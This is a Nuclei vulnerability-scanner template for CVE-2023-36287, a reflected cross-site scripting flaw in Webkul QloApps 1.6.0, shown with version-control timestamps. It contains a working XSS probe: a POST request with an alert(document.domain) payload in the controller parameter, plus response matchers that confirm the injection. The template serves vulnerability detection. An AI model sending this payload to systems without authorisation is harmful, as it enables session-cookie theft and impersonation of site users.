nuclei-templates/http/cves/2023/CVE-2023-36287.yaml

56 lines
1.7 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2023-36287
info:
name: Webkul QloApps 1.6.0 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
2023-09-06 11:43:37 +00:00
remediation: |
To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor.
2023-07-07 09:38:49 +00:00
reference:
- https://github.com/webkul/hotelcommerce
- https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900
- https://nvd.nist.gov/vuln/detail/CVE-2023-36287
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-07-07 09:38:49 +00:00
cvss-score: 6.1
cve-id: CVE-2023-36287
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00077
epss-percentile: 0.31522
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:*
2023-07-07 09:38:49 +00:00
metadata:
verified: "true"
2023-09-06 11:43:37 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: webkul
product: qloapps
2023-07-07 09:38:49 +00:00
tags: cve,cve2023,xss,webkul-qloapps,unauth
http:
- raw:
- |
POST / HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
controller=change-currency9405'-alert(document.domain)-'&id_currency=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'change-currency9405'-alert(document.domain)-'';"
- "customizationIdMessage"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200